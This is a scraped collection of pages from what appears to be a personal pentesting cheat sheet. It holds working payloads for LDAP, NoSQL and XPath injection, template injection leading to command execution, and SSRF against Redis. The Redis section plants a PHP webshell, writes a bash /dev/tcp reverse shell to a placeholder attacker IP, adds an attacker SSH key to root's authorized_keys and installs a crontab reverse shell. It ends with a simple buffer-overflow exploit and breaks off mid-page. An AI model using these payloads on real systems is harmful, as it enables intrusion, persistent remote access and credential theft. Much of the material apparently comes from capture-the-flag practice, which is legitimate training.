proxychains](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#scanning-nmap-can-be-very-long-through-proxychains) * [You can speed it up by using xargs and multithreading](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#you-can-speed-it-up-by-using-xargs-and-multithreading) * [The main goal is to spread ports between different threads (-P 50)](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#the-main-goal-is-to-spread-ports-between-different-threads-p-50) * [Take care of some options](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#take-care-of-some-options) * [You can't just run -oA but need the --append-output option](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#you-cant-just-run-oa-but-need-the-append-output-option) * [The same behavior can be used to scan multiple machines](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#the-same-behavior-can-be-used-to-scan-multiple-machines) * [The base command](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#the-base-command) * [Become](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#become) * [Pivot 1 using proxychains](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#pivot-1-using-proxychains) * [Configure /etc/proxychains to set port 1080](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#configure-etc-proxychains-to-set-port-1080) * [Pivot 2 using proxychains](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#pivot-2-using-proxychains) * [Configure /etc/proxychains to set port 1081](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#configure-etc-proxychains-to-set-port-1081) * [Windows](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#windows) * [Metasploit](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#metasploit) * [Reverse ssh tunnel, port forwarding 8090 from target to us:](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#reverse-ssh-tunnel-port-forwarding-8090-from-target-to-us) * [Local port forward, forward local 8090 to target:](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#local-port-forward-forward-local-8090-to-target) * [Local port forwarding](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#local-port-forwarding) * [Local port opened on 127.0.0.1 (bind)](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#local-port-opened-on-127.0.0.1-bind) * [\-N == no command executed (only ssh tunnel)](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#n-no-command-executed-only-ssh-tunnel) * [$ ssh user@pivoting\_machine -L \[bind\_address:\]local\_port:destination\_host:destination\_hostport -N](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#usd-ssh-user-pivoting_machine-l-bind_address-local_port-destination_host-destination_hostport-n) * [Transparent proxy over SSH](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#transparent-proxy-over-ssh) * [Forwarding traffic through the pivot](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#forwarding-traffic-through-the-pivot) * [It will then auto create necessary iptables rules](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#it-will-then-auto-create-necessary-iptables-rules) * [You can also let sshuttle detect networks based on the target](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#you-can-also-let-sshuttle-detect-networks-based-on-the-target) * [\-x == exclude some network to not transmit over the tunnel](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#x-exclude-some-network-to-not-transmit-over-the-tunnel) * [Reverse Shell generation](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#reverse-shell-generation) * [Setup listener](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#setup-listener) * [Autoroute module](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#autoroute-module) * [On windows you can use post/windows/gather/arp\_scanner to discover other machines](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#on-windows-you-can-use-post-windows-gather-arp_scanner-to-discover-other-machines) * [On Linux you can try arp -a](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#on-linux-you-can-try-arp-a) * [SOCKS proxy setup](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#socks-proxy-setup) * [Now, equivalent to a dynamic SSH](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#now-equivalent-to-a-dynamic-ssh) * [Double Pivoting](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#double-pivoting) * [Reverse shell from the pwned2 to the pwned1](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#reverse-shell-from-the-pwned2-to-the-pwned1) * [Setup handler and exploit the found vulnerability](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#setup-handler-and-exploit-the-found-vulnerability) * [Ncat =/= netcat](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#ncat-netcat) * [Enhanced version, developped by nmap dev and often packaged with](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#enhanced-version-developped-by-nmap-dev-and-often-packaged-with) * [Ciphered connexion, IP restriction](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#ciphered-connexion-ip-restriction) * [To pivot, needed on both attacker and pivot machine](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#to-pivot-needed-on-both-attacker-and-pivot-machine) * [Attacker (broker == accept multiple connexions)](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#attacker-broker-accept-multiple-connexions) * [Pivot](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#pivot) * [We connect to attacker and target](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#we-connect-to-attacker-and-target) * [Chisel offers to encapsulate TCP connexions in HTTP tunnels](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#chisel-offers-to-encapsulate-tcp-connexions-in-http-tunnels) * [Everything is encrypted using SSH](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#everything-is-encrypted-using-ssh) * [Local port forwarding](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#local-port-forwarding-1) * [Pivot machine](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#pivot-machine) * [Attacker machine](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#attacker-machine) * [Local port forwarding + SOCKS proxy](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#local-port-forwarding--socks-proxy) * [Pivot machine](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#pivot-machine-1) * [Attacker machine](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#attacker-machine-1) * [Reverse remote port forwarding](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#reverse-remote-port-forwarding) * [Attacker machine](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#attacker-machine-2) * [Pivot machine](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#pivot-machine-2) * [Similar features to other tools but support multilevel pivot](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#similar-features-to-other-tools-but-support-multilevel-pivot) * [Like Metasploit](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#like-metasploit) * ["Remote" local port forwarding](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#remote-local-port-forwarding) * [On the pivot](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#on-the-pivot) * ["Remote" dynamic port forwarding](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#remote-dynamic-port-forwarding) * [Everything is through HTTP](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#everything-is-through-http) * [Bypass some IPS/IDS](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#bypass-some-ips-ids) * [First step is to deploy webshell on the target](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#first-step-is-to-deploy-webshell-on-the-target) * [Some are available with the tool (but not good)](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#some-are-available-with-the-tool-but-not-good) * [Can be hard to use](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#can-be-hard-to-use) * [Then on the attacker machine](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#then-on-the-attacker-machine) --- # Basic LDAP Injection | Pentesting ![Page cover](https://morgan-bin-bash.gitbook.io/pentesting/~gitbook/image?url=https%3A%2F%2F833483961-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FA916U6dckatxb6TsA24w%252Fuploads%252Fz4hhNRD5uTWLfviuIG2Y%252F20.jpg%3Falt%3Dmedia%26token%3D094dfd16-6207-466f-8a81-3f2507f690d3&width=1248&dpr=3&quality=100&sign=59461e28&sv=2) `# Classical request : (&(uid=)(userPassword=))` `# So result is TRUE if uid AND userPassword are true` `# You can put ‘)’ in request to crash and see the request` `username : *)(|(uid=*` `password : )` `→ (&(uid=*)(|(uid=*)(userPassword=)))` `OR` `username=*` `password=*)(&` `→ (&(uid=*)(userPassword=*)(&))` **Blind LDAP Injection** `# You have to find/imagine how is the request built` `# test using only a char → OK → request is (mail=*[texte]*)` `# You can try (mail=*)(sn=*) → )(sn= → OK` `# Then, the password attribute (mail=*)(password=*) → OK` `@*)(password=x → FALSE` `@*)(password=d → TRUE` `# You can the enumerate each char` [PreviousNOSQL injectionschevron-left](https://morgan-bin-bash.gitbook.io/pentesting/nosql-injections) [NextBasic authentication bypasschevron-right](https://morgan-bin-bash.gitbook.io/pentesting/basic-authentication-bypass) Last updated 2 years ago --- # Aquatone | Pentesting ![Page cover](https://morgan-bin-bash.gitbook.io/pentesting/~gitbook/image?url=https%3A%2F%2F833483961-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FA916U6dckatxb6TsA24w%252Fuploads%252Fz4hhNRD5uTWLfviuIG2Y%252F20.jpg%3Falt%3Dmedia%26token%3D094dfd16-6207-466f-8a81-3f2507f690d3&width=1248&dpr=3&quality=100&sign=59461e28&sv=2) Aquatone is a complete tool separate in three commands to make complete recon Collector modules : Dictionary brute force DNSDB.org Google Transparency Report HackerTarget Netcraft Shodan (API key needed) ThreatCrowd VirusTotal (API key needed) **PHASE 1 :** Discovery aquatone-discover is the first step It uses name servers and performs some test to see if wildcard is configured Then it asks each subdomain collector for potential subdomain Then it tries to resolve them to see which ones are up and creates the hosts.txt file aquatone-discover -d domain.com **PHASE 2 :** Scanning aquatone-scan will try to find which subdomains serve web content By default it will scan 80, 443, 8000, 8080 and 8443 but you can specify ports with --ports or pre-configured aliases (small, medium, large, huge) It creates open\_ports.txt and urls.tx **PHASE 3 :** Gathering aquatone-gather can collect HTTP response and screenshots It uses Nightmare tool to do that It creates headers, html, report and screenshots folder CLI Tricks Get server technology stats (headers folder) cat \* | grep 'Server:' | sort | uniq -c | sort -nr Find more subdomains (html folder) cat \* | egrep -o '\[a-z0-9-\_.\]+.corp.yahoo.com' | sort -u Find HTML comments (html folder) cat \* | egrep -o '' [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/aquatone#find-pages-with-password-field-html-folder) Find pages with password field (html folder) -------------------------------------------------------------------------------------------------------------------------------------------------------------- grep 'type="password"' \* [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/aquatone#get-hosts-listening-on-port-443) Get hosts listening on port 443 -------------------------------------------------------------------------------------------------------------------------------------- cat open\_ports.txt | grep ',443' | cut -d "," -f 1 [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/aquatone#check-https-hosts-for-heartbleed) Check HTTPS hosts for Heartbleed ---------------------------------------------------------------------------------------------------------------------------------------- grep https urls.txt | cut -d '/' -f 3 > /tmp/targets.lst sslscan --targets=/tmp/targets.lst --no-ciphersuites --no-fallback --no-renegotiation --no-compression --no-check-certificate [PreviousPivoting techniqueschevron-left](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques) [NextNOSQL injectionschevron-right](https://morgan-bin-bash.gitbook.io/pentesting/nosql-injections) Last updated 2 years ago * [Find pages with password field (html folder)](https://morgan-bin-bash.gitbook.io/pentesting/aquatone#find-pages-with-password-field-html-folder) * [Get hosts listening on port 443](https://morgan-bin-bash.gitbook.io/pentesting/aquatone#get-hosts-listening-on-port-443) * [Check HTTPS hosts for Heartbleed](https://morgan-bin-bash.gitbook.io/pentesting/aquatone#check-https-hosts-for-heartbleed) --- # NOSQL injections | Pentesting ![Page cover](https://morgan-bin-bash.gitbook.io/pentesting/~gitbook/image?url=https%3A%2F%2F833483961-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FA916U6dckatxb6TsA24w%252Fuploads%252Fz4hhNRD5uTWLfviuIG2Y%252F20.jpg%3Falt%3Dmedia%26token%3D094dfd16-6207-466f-8a81-3f2507f690d3&width=1248&dpr=3&quality=100&sign=59461e28&sv=2) NoSQLMap https://github.com/codingo/NoSQLMap 1-Set options (do this first) 2-NoSQL DB Access Attacks 3-NoSQL Web App attacks 4-Scan for Anonymous MongoDB Access x-Exit Basic Authentication index.php?login\[$regex\]=a.\*&pass\[$ne\]=lol index.php?login\[$gt\]=admin&login\[$lt\]=test&pass\[$ne\]=1 [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/nosql-injections#basic-nosql-injection) Basic NoSQL Injection -------------------------------------------------------------------------------------------------------------------------- http://url?login\[$nin\]\[\]=admin&login\[$nin\]\[\]=test&pass\[$ne\]=toto Blind NoSQL Injection [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/nosql-injections#get-size) Get size ------------------------------------------------------------------------------------------------ index.php ?chall\_name=nosqlblind&flag\[$regex\]=.1 [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/nosql-injections#enumeration) Enumeration ------------------------------------------------------------------------------------------------------ index.php ?chall\_name=nosqlblind&flag\[$regex\]=3a.20 [PreviousAquatonechevron-left](https://morgan-bin-bash.gitbook.io/pentesting/aquatone) [NextBasic LDAP Injectionchevron-right](https://morgan-bin-bash.gitbook.io/pentesting/basic-ldap-injection) Last updated 2 years ago * [Basic NoSQL Injection](https://morgan-bin-bash.gitbook.io/pentesting/nosql-injections#basic-nosql-injection) * [Get size](https://morgan-bin-bash.gitbook.io/pentesting/nosql-injections#get-size) * [Enumeration](https://morgan-bin-bash.gitbook.io/pentesting/nosql-injections#enumeration) --- # Basic authentication bypass | Pentesting ![Page cover](https://morgan-bin-bash.gitbook.io/pentesting/~gitbook/image?url=https%3A%2F%2F833483961-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FA916U6dckatxb6TsA24w%252Fuploads%252Fz4hhNRD5uTWLfviuIG2Y%252F20.jpg%3Falt%3Dmedia%26token%3D094dfd16-6207-466f-8a81-3f2507f690d3&width=1248&dpr=3&quality=100&sign=59461e28&sv=2) `# XPath login/password often works as follow` `# $xpath = "//user[user='" . $_GET['user'] . "' and pass='" . $_GET['pass'] . "']";` `# You can make the 2 conds TRUE and log with the first user` `user=' or '1'='1&pass=' or '1'='1` `# Log using a specific user` `//user[username='' or '1'='1' and password='truc']` `⇒ John' or '1'='1` `# Bypass the password (because of the ‘=’)` `' or username='John' or ''='` **String XPath Injection** `# You can use following: to display all the following attributes after the node` `a')]/following::*[('1'='1` `# You can inject in the contains()` `# Just bypass the first condition to get out of //user/username and then display the whole user content` `search=')] | //user/*[contains(*,'` `# You can just escape username to request password field` `search=Har')%20and%20contains(../password,'c` `search=Har') and starts-with(../password,'c` **Blind XPath Injection** `# Identify columns` `&userid=2 and password` `# The first thing is to retrieve the password length, through boolean expression` `# First is wrong OR user1 displayed if password is 10 long OR user2 displayed` `userid=22222 ] | //user[1][userid=1 and string-length(//user[2]/password)=10] | //user[userid=2` `# Then you can start to bruteforce char` `userid=1 and substring(//user[1]/password,1,1)='p'` `# If quotes are filtered, you can use others XML objects to compare (limited dictionnary)` `# First is wrong OR user1 displayed if the user2's password first char = user1's username first char OR user2 displayed` `userid="22222 ] | //user[1][userid=1 and substring(//user[2]/password,1,1)=substring(//user[1]/username,1,1) ] | //user[userid=2`\ \ [PreviousBasic LDAP Injectionchevron-left](https://morgan-bin-bash.gitbook.io/pentesting/basic-ldap-injection)\ [NextSERVER SIDE REQUEST FORGERY (SSRF)chevron-right](https://morgan-bin-bash.gitbook.io/pentesting/server-side-request-forgery-ssrf)\ \ Last updated 2 years ago --- # SSTI | Pentesting ![Page cover](https://morgan-bin-bash.gitbook.io/pentesting/~gitbook/image?url=https%3A%2F%2F833483961-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FA916U6dckatxb6TsA24w%252Fuploads%252Fz4hhNRD5uTWLfviuIG2Y%252F20.jpg%3Falt%3Dmedia%26token%3D094dfd16-6207-466f-8a81-3f2507f690d3&width=1248&dpr=3&quality=100&sign=59461e28&sv=2) #### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/ssti#server-side-template-injection) Server Side Template Injection `# You can use tools like tplmap` `./tplmap.py -u http://challenge01.root-me.org/web-serveur/ch41/check -d "nickname=john"` `./tplmap.py -u http://challenge01.root-me.org/web-serveur/ch41/check -d "nickname=john" --os-shell` `# Freemarker command execution` `<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("cmd") }` [PreviousSQL injectionschevron-left](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections) [NextEasy - No Protectionschevron-right](https://morgan-bin-bash.gitbook.io/pentesting/easy-no-protections) Last updated 2 years ago --- # SERVER SIDE REQUEST FORGERY (SSRF) | Pentesting ![Page cover](https://morgan-bin-bash.gitbook.io/pentesting/~gitbook/image?url=https%3A%2F%2F833483961-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FA916U6dckatxb6TsA24w%252Fuploads%252Fz4hhNRD5uTWLfviuIG2Y%252F20.jpg%3Falt%3Dmedia%26token%3D094dfd16-6207-466f-8a81-3f2507f690d3&width=1248&dpr=3&quality=100&sign=59461e28&sv=2) https://vinc.top/2016/11/24/server-side-request-forgery https://github.com/allanlw/svg-cheatsheet PoC and enumeration [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/server-side-request-forgery-ssrf#it-is-possible-to-prove-the-vulnerability-by-reading-local-files) It is possible to prove the vulnerability by reading local files -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/server-side-request-forgery-ssrf#using-the-file-protocol) Using the file protocol ---------------------------------------------------------------------------------------------------------------------------------------------- url=file:///etc/passwd [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/server-side-request-forgery-ssrf#then-you-can-enumerate-local-services-that-are-listening) Then you can enumerate local services that are listening ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/server-side-request-forgery-ssrf#depending-on-the-response) Depending on the response -------------------------------------------------------------------------------------------------------------------------------------------------- http://localhost: [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/server-side-request-forgery-ssrf#it-is-also-possible-to-use-others-protocols-like-gopher-and-dict) It is also possible to use others protocols like gopher and dict -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/server-side-request-forgery-ssrf#they-dont-send-http-headers-and-can-avoid-misinterpretation) They don't send HTTP headers and can avoid misinterpretation ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- gopher://127.0.0.1:6379/test [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/server-side-request-forgery-ssrf#filter-bypass) Filter bypass -------------------------------------------------------------------------------------------------------------------------- http://127.1 instead of http://127.0.0.1 http://0 instead of http://localhost http://0xC0A80001 or http://3232235521 => 192.168.0.1 192.168.516 => 192.168.2.4 Redis Exploitation [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/server-side-request-forgery-ssrf#redis-is-a-database-system-that-stores-everything-in-ram) Redis is a database system that stores everything in RAM ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/server-side-request-forgery-ssrf#getting-a-webshell) Getting a webshell ------------------------------------------------------------------------------------------------------------------------------------ url=dict://127.0.0.1:6379/CONFIG%20SET%20dir%20/var/www/html url=dict://127.0.0.1:6379/CONFIG%20SET%20dbfilename%20file.php url=dict://127.0.0.1:6379/SET%20mykey%20"<\\x3Fphp system($\_GET\[0\])\\x3F>" url=dict://127.0.0.1:6379/SAVE [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/server-side-request-forgery-ssrf#getting-a-reverse-shell) Getting a reverse shell ---------------------------------------------------------------------------------------------------------------------------------------------- gopher://127.0.0.1:6379/\_config%20set%20dir%20%2Fvar%2Fwww%2Fhtml gopher://127.0.0.1:6379/\_config%20set%20dbfilename%20reverse.php gopher://127.0.0.1:6379/\_set%20payload%20%22%3C%3Fphp%20shell\_exec%28%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2FREMOTE\_IP%2FREMOTE\_PORT%200%3E%261%27%29%3B%3F%3E%22 gopher://127.0.0.1:6379/\_save nc -lvp http://site.org/reverse.php [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/server-side-request-forgery-ssrf#priv.-esc.-using-ssh-key) Priv. Esc. using SSH key ------------------------------------------------------------------------------------------------------------------------------------------------ ssh-keygen url=dict://127.0.0.1:6379/SET%20mykey%20"\\n\\nCLE\_PUB\_RSA\_ICI\\n\\n" url=dict://127.0.0.1:6379/CONFIG%20SET%20dir%20/root/.ssh url=dict://127.0.0.1:6379/CONFIG%20SET%20dbfilename%20authorized\_keys url=dict://127.0.0.1:6379/SAVE ssh -i id\_rsa root@host.org [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/server-side-request-forgery-ssrf#you-can-use-dict-protocol-and-crontab) You can use dict protocol and crontab -------------------------------------------------------------------------------------------------------------------------------------------------------------------------- [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/server-side-request-forgery-ssrf#you-set-the-working-directory) \- You set the working directory ------------------------------------------------------------------------------------------------------------------------------------------------------------- [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/server-side-request-forgery-ssrf#update-the-redis-database-location) \- Update the redis database location ----------------------------------------------------------------------------------------------------------------------------------------------------------------------- [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/server-side-request-forgery-ssrf#listening) \- Listening --------------------------------------------------------------------------------------------------------------------- [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/server-side-request-forgery-ssrf#write-a-reverse-shell-payload) \- Write a reverse shell payload ------------------------------------------------------------------------------------------------------------------------------------------------------------- [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/server-side-request-forgery-ssrf#save-it) \- Save it ----------------------------------------------------------------------------------------------------------------- dict ://127.0.0.1:6379/config set dir /var/spool/cron/ dict ://127.0.0.1:6379/config set dbfilename root nc -lvp dict ://127.0.0.1:6379/set -.- "\\n\\n\\n\* \* \* \* \* bash -i >\\x26 /dev/tcp/"ip"/"port" 0>\\x261\\n\\n\\n" dict ://127.0.0.1:6379/save [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/server-side-request-forgery-ssrf#you-can-also-use-the-gopher-protocol-replace-ip-and-port) You can also use the gopher protocol (replace IP and port) ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ url=gopher%3A//127.0.0.1%3A6379/\_%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252462%250D%250A%250A%250A%252A/ [PreviousBasic authentication bypasschevron-left](https://morgan-bin-bash.gitbook.io/pentesting/basic-authentication-bypass) [NextSQL injectionschevron-right](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections) Last updated 2 years ago * [It is possible to prove the vulnerability by reading local files](https://morgan-bin-bash.gitbook.io/pentesting/server-side-request-forgery-ssrf#it-is-possible-to-prove-the-vulnerability-by-reading-local-files) * [Using the file protocol](https://morgan-bin-bash.gitbook.io/pentesting/server-side-request-forgery-ssrf#using-the-file-protocol) * [Then you can enumerate local services that are listening](https://morgan-bin-bash.gitbook.io/pentesting/server-side-request-forgery-ssrf#then-you-can-enumerate-local-services-that-are-listening) * [Depending on the response](https://morgan-bin-bash.gitbook.io/pentesting/server-side-request-forgery-ssrf#depending-on-the-response) * [It is also possible to use others protocols like gopher and dict](https://morgan-bin-bash.gitbook.io/pentesting/server-side-request-forgery-ssrf#it-is-also-possible-to-use-others-protocols-like-gopher-and-dict) * [They don't send HTTP headers and can avoid misinterpretation](https://morgan-bin-bash.gitbook.io/pentesting/server-side-request-forgery-ssrf#they-dont-send-http-headers-and-can-avoid-misinterpretation) * [Filter bypass](https://morgan-bin-bash.gitbook.io/pentesting/server-side-request-forgery-ssrf#filter-bypass) * [Redis is a database system that stores everything in RAM](https://morgan-bin-bash.gitbook.io/pentesting/server-side-request-forgery-ssrf#redis-is-a-database-system-that-stores-everything-in-ram) * [Getting a webshell](https://morgan-bin-bash.gitbook.io/pentesting/server-side-request-forgery-ssrf#getting-a-webshell) * [Getting a reverse shell](https://morgan-bin-bash.gitbook.io/pentesting/server-side-request-forgery-ssrf#getting-a-reverse-shell) * [Priv. Esc. using SSH key](https://morgan-bin-bash.gitbook.io/pentesting/server-side-request-forgery-ssrf#priv.-esc.-using-ssh-key) * [You can use dict protocol and crontab](https://morgan-bin-bash.gitbook.io/pentesting/server-side-request-forgery-ssrf#you-can-use-dict-protocol-and-crontab) * [\- You set the working directory](https://morgan-bin-bash.gitbook.io/pentesting/server-side-request-forgery-ssrf#you-set-the-working-directory) * [\- Update the redis database location](https://morgan-bin-bash.gitbook.io/pentesting/server-side-request-forgery-ssrf#update-the-redis-database-location) * [\- Listening](https://morgan-bin-bash.gitbook.io/pentesting/server-side-request-forgery-ssrf#listening) * [\- Write a reverse shell payload](https://morgan-bin-bash.gitbook.io/pentesting/server-side-request-forgery-ssrf#write-a-reverse-shell-payload) * [\- Save it](https://morgan-bin-bash.gitbook.io/pentesting/server-side-request-forgery-ssrf#save-it) * [You can also use the gopher protocol (replace IP and port)](https://morgan-bin-bash.gitbook.io/pentesting/server-side-request-forgery-ssrf#you-can-also-use-the-gopher-protocol-replace-ip-and-port) --- # GENERAL INFORMATION | Pentesting ![Page cover](https://morgan-bin-bash.gitbook.io/pentesting/~gitbook/image?url=https%3A%2F%2F833483961-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FA916U6dckatxb6TsA24w%252Fuploads%252Fz4hhNRD5uTWLfviuIG2Y%252F20.jpg%3Falt%3Dmedia%26token%3D094dfd16-6207-466f-8a81-3f2507f690d3&width=1248&dpr=3&quality=100&sign=59461e28&sv=2) **MISC - Tricks** `# Checking program/binary protections` `checksec --file ./binary` `# Getting more informations about an ELF` `readelf -a ./binary` `# Gettign system() adress` `# Can be simple` `objdump -D ./binary | grep system` `# Getting known string ("GNU" for example)` `# Look for` `objdump -s ./binary` `# Getting padding using pwntools` `>> from pwn import *` `# Generate pattern` `>> cyclic(400)` `## Find offset where SIGSEGV` `>> find_cyclic('')` `>> find_cyclic('yaac')` `# You can list gadgets using ROPGadgets.py` `# And then look for one you want` `./ROPgadget.py --binary ./binary` [arrow-up-right](https://cheatsheet.haax.fr/pwn/buffer-overflow/easy_no_protection/) [PreviousEasy - No Protectionschevron-left](https://morgan-bin-bash.gitbook.io/pentesting/easy-no-protections) [NextXML External Entity (XXE) Injection Payloadschevron-right](https://morgan-bin-bash.gitbook.io/pentesting/xml-external-entity-xxe-injection-payloads) Last updated 2 years ago --- # Easy - No Protections | Pentesting ![Page cover](https://morgan-bin-bash.gitbook.io/pentesting/~gitbook/image?url=https%3A%2F%2F833483961-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FA916U6dckatxb6TsA24w%252Fuploads%252Fz4hhNRD5uTWLfviuIG2Y%252F20.jpg%3Falt%3Dmedia%26token%3D094dfd16-6207-466f-8a81-3f2507f690d3&width=1248&dpr=3&quality=100&sign=59461e28&sv=2) **Simple Buffer Overflow (no protection) - Function call** `# Code` `void copy_ordre(char *arg)` `{` `char ordre[50];` `strcpy(ordre,arg);` `printf("Ordre reçu : %s\n",ordre);` `}` `int main(int argc, char** argv) {` `if(argc < 2) {` `printf("Bienvenue, humain. Donnez-nous vos ordres. En cas de bonne réponse, nous vous épargnerons. Le cas échéant, nous détruirons la terre.");` `printf("Usage: %s ", argv[0]);` `exit(0);` `}` `printf("Bienvenue, humain. Donnez-nous vos ordres. En cas de bonne réponse, nous vous épargnerons. Le cas échéant, nous détruirons la terre.");` `copy_ordre(argv[1]);` `earth_destroy();` `return 0;` `}` `void earth_destroy() {` `printf("Mauvaise réponse ! Nous détruirons votre planète dans quelques minutes.");` `}` `void earth_alive() {` `printf("Nous nous avouons vaincu. Vous avez gagné, nous vous rendons la terre !");` `execve("/bin/sh", NULL, NULL);` `}` `# Explanations and Exploit` `# The goal is to call earth_alive() function` `# The buffer is 50 bytes long, so by submitting 50+ char, you can override what is after` `# You have EIP, EBP and one argument (char) on the stack, so 12 bytes` `# So, to override what you want and call the function, you will need to send 62 char before the payload` `# The payload is the function adress you want to send` `$ nm ./pwn1 | grep "earth_alive"` `08048acb T earth_alive` `# So, the payload will be the following` `./pwn1 $(python -c 'print "A"*62 + "\xcb\x8a\x04\x08"')` **Simple 